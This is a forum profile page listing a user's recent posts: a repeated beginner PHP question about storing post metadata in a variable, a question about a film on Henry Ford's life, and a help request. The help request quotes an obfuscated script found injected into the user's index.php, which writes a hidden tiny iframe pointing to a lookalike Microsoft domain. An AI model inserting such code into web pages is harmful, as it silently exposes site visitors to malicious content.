Recent content by Ciprian

  1. C

    Php help Please! Variable?

    I want to create a variable but I don't know php too well. <?php if(get_post_meta(get_the_ID(), "place", true)) : ?> <?php echo get_post_meta(get_the_ID(), "place", true); ?> <---- this echos out a location <?php endif; ?> <?php $geoinfo = "?" ?> <------ I want the location...
  2. C

    Php help Please! Variable?

    I want to create a variable but I don't know php too well. <?php if(get_post_meta(get_the_ID(), "place", true)) : ?> <?php echo get_post_meta(get_the_ID(), "place", true); ?> <---- this echos out a location <?php endif; ?> <?php $geoinfo = "?" ?> <------ I want the location...
  3. C

    the name of the movie with Ford's life?

    Hello. I would like to know if anyone knows what was the name of the film/movie that had a plot about Ford's life. I mean Henry Ford not Harrison Ford. Henry Ford, the one that invented the Ford Motor Company and the assembly lines used in mass production of cars. I can only remember it was some...
  4. C

    This line of code keeps showing up in my index.php. What do I do?

    <?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>
Back
Top